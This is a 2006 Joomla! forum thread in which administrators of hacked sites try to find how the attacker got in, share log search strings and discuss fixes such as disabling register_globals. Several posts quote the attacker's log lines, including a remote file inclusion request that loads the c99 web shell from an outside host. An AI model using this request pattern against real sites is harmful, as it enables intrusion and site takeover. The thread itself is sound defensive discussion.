The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 35 posts ]  Go to page 1, 2  Next
Author Message
PostPosted: Mon Jul 10, 2006 12:01 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7
I had a look here:

http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1

Because this person has hacked my site twice in the last 2 days. There seems to be a lot of joomla/mambo sites on the list of reported attacks of sites he's hacked and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.

Does anyone have any ideas?


Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 12:07 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5
We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike


Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 12:19 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7
Mike G. wrote:

We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike


We used to have a phpBB forum but changed it to vBulletin about a year ago but there is still a phpbb component installed - my other half is the techie and he did tell me why at the weekend that we can't remove it but I can't remember why right now - I went though removing all components and modules that we don't need/use and removed them as well as updated any to the latest versions etc... and my other half has tried changing settings to make it even more secure but he still got to the site for a second time. Im just glad we take regular backups and save them elsewhere.


Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 12:28 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA
@Maggles,

I have sent you a Personal Message.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 12:30 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Aug 22, 2005 12:36 am
Posts: 7
RobS wrote:
@Maggles,

I have sent you a Personal Message.


Thanks, I've emailed you to the address you supplied.


Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 1:49 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 2:04 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5
The attack to our site came from 81.213.180.37, also a turkish site.

As I found in the logfiles, they used a PHP/BackDoor script infecting the site trough the phpBB download feature !!!

CAUTION! The script resides at this site:  [mod edit: do not post links to viruses. link omited - ChiefGoFor]  and might become active if you follow the link, my virusscanner (McAfee) was detecting it in the browser.

Regards,

Mike


Last edited by ChiefGoFor on Mon Jul 10, 2006 2:25 pm, edited 1 time in total.

Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 2:13 pm 
User avatar
Joomla! Virtuoso
Joomla! Virtuoso

Joined: Fri Aug 19, 2005 8:46 am
Posts: 3011
Location: Stockholm, Sweden
Warning, above link contains a trojan virus script .. as adviced by the poster

_________________
Industributik - http://www.industributiken.se


Last edited by LorenzoG on Mon Jul 10, 2006 2:23 pm, edited 1 time in total.

Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 3:36 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Jul 10, 2006 11:57 am
Posts: 5
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....  :-\

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.

Regards,

Mike


Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 4:05 pm 
User avatar
Joomla! Champion
Joomla! Champion

Joined: Tue Sep 13, 2005 12:22 am
Posts: 5279
Location: Omaha, Nebraska, USA
Mike G. wrote:

Hmm ... but it might be helpful for other users to know what to search in their logfiles ....  :-\

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.


I agree with you. It was kind of a catch 22 there. Your solution for seaching for those key terms is great! Thank you for the information.

_________________
Kenneth Crowder - Omaha, Nebraska, USA
Global Moderator - Joomla! ...because open source matters
Recipes for people with food allergies: http://intolerantoffspring.com
Author of "Joomla! 1.5: Developing Secure Sites": http://www.lynda.com/home/DisplayCourse.aspx?lpk2=73559


Top
 Profile  
 
PostPosted: Mon Jul 10, 2006 4:11 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA
Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Last edited by RobS on Tue Jul 11, 2006 1:07 am, edited 1 time in total.

Top
 Profile  
 
PostPosted: Mon Jul 17, 2006 2:16 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa
Our site also got hacked this weekend by this same Eno7 guy - his page over writes your configuration.php file - how do we prevent this from happening again... this is a very serious issue.  I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2.  Is there some common denominator that allows this guy easy access to hack Joomla powered sites?  Everything in our root folder of our site is read only, so how did this happen?

Thanks

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net


Top
 Profile  
 
PostPosted: Mon Jul 17, 2006 2:26 pm 
User avatar
Joomla! Champion
Joomla! Champion

Joined: Tue Sep 13, 2005 12:22 am
Posts: 5279
Location: Omaha, Nebraska, USA
To my knowedge, this is not a "Joomla" issue. It is an issue with the components not using some key Joomla Security measures. I think your case, the culprit is SMF.

RobS knows more about it than I do, so I will let him give you a more formal answer.

_________________
Kenneth Crowder - Omaha, Nebraska, USA
Global Moderator - Joomla! ...because open source matters
Recipes for people with food allergies: http://intolerantoffspring.com
Author of "Joomla! 1.5: Developing Secure Sites": http://www.lynda.com/home/DisplayCourse.aspx?lpk2=73559


Top
 Profile  
 
PostPosted: Mon Jul 17, 2006 2:38 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57
What are the practical steps to restore the website.  We've just been hacked through SMF component:

85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......

And then what are the practical steps to prevent it from recurring

Thank you

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org


Last edited by infograf768 on Mon Jul 17, 2006 2:49 pm, edited 1 time in total.

Top
 Profile  
 
PostPosted: Mon Jul 17, 2006 2:45 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Concerning SMF
http://forum.joomla.org/index.php/topic,76520.0.html

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
PostPosted: Mon Jul 17, 2006 2:52 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57
Thank you

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org


Top
 Profile  
 
PostPosted: Mon Jul 17, 2006 3:32 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa
Thanks...

One question... will that fix prevent this clown from doing this again?

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net


Top
 Profile  
 
PostPosted: Mon Jul 24, 2006 9:22 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Tue Aug 30, 2005 1:19 pm
Posts: 10
Location: Hamburg
CiPHeR wrote:
One question... will that fix prevent this clown from doing this again?


i´d love to know that!
anybody..  :-*


Top
 Profile  
 
PostPosted: Mon Jul 24, 2006 3:57 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Sun Jul 09, 2006 10:41 am
Posts: 17
Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx

If it comes from the same place
Or disable the component and upgrade :)


Top
 Profile  
 
PostPosted: Mon Jul 24, 2006 5:42 pm 
Joomla! Explorer
Joomla! Explorer

Joined: Thu Aug 18, 2005 8:54 pm
Posts: 374
zomertje wrote:
Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx


That wont help since it is a dynamic IP of that provider who is known to support or at least not do anything against hackers (his name not allowed to be told in these forums otherwise you get flamed). The same computer may have another IP next time.

You would need to ban all IP's of that provide. In case you need them PM me and I will send you the whole range.


Top
 Profile  
 
PostPosted: Tue Jul 25, 2006 2:25 am 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57
CiPHeR wrote:
Thanks...

One question... will that fix prevent this clown from doing this again?


Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org


Top
 Profile  
 
PostPosted: Tue Jul 25, 2006 3:07 am 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 828
Location: California, Germany, Norway
I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.

What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.

Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.

If Joomla pros would like log files or other details, contact me.

I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.

_________________
Home: http://www.ronliskey.com
Business http://www.communitygrove.com


Top
 Profile  
 
PostPosted: Tue Jul 25, 2006 5:28 am 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Tue Jun 06, 2006 7:41 am
Posts: 828
Location: California, Germany, Norway
Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"

_________________
Home: http://www.ronliskey.com
Business http://www.communitygrove.com


Top
 Profile  
 
PostPosted: Tue Jul 25, 2006 6:39 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
PostPosted: Tue Jul 25, 2006 12:00 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Sat Oct 15, 2005 7:07 pm
Posts: 51
Location: Ottawa
anna.y wrote:
CiPHeR wrote:
Thanks...

One question... will that fix prevent this clown from doing this again?


Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna



I dont know why all hosts DONT have register globals=OFF!

_________________
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net


Top
 Profile  
 
PostPosted: Tue Jul 25, 2006 12:16 pm 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
CiPHeR wrote:
I dont know why all hosts DONT have register globals=OFF!


register_globals is not, in itself, insecure - the problem is that globals is often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!
So, if people do not report to their hosts when sites get hacked, or dont ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Top
 Profile  
 
PostPosted: Tue Jul 25, 2006 4:56 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Fri Sep 09, 2005 5:28 am
Posts: 57
infograf768 wrote:
using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK


I got hacked through older version of com_SMF and deleting all root files and re-installing everything was NOT an option.

All I had to do in addition to adding the recommended line was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.

It was rather simple and as I said despite hundreds attempts of hacking I'm having no further problems (keeping my fingers crossed isprobably helping as well...  ;))

Anna 

_________________
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org


Top
 Profile  
 
PostPosted: Wed Aug 09, 2006 8:17 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Wed Aug 09, 2006 8:13 am
Posts: 3
How he able to alter the MYSQL db?


Top
 Profile  
 
PostPosted: Mon Aug 14, 2006 2:46 am 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Thu Sep 01, 2005 5:41 am
Posts: 76
rliskey wrote:
Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"



I was hacked by a turkish hacker today.


[
Code:
14-Aug-2006 07:20:22] PHP Warning:  main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found
 in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97


i don't know why it shows turx.nl is extcalendar the culprit?

_________________
The man who speaks to you of sacrifice speaks of slaves and masters. And intends to be the master. --Ayn Rand


Top
 Profile  
 
PostPosted: Mon Aug 14, 2006 6:13 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
What you are posting looks like the error log and not the raw logs.

Download and open your rawlogs in an editor to check for GET and "mosconfig" strings so as to figure exactly where they got in.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 35 posts ]  Go to page 1, 2  Next



Who is online

Users browsing this forum: No registered users and 18 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group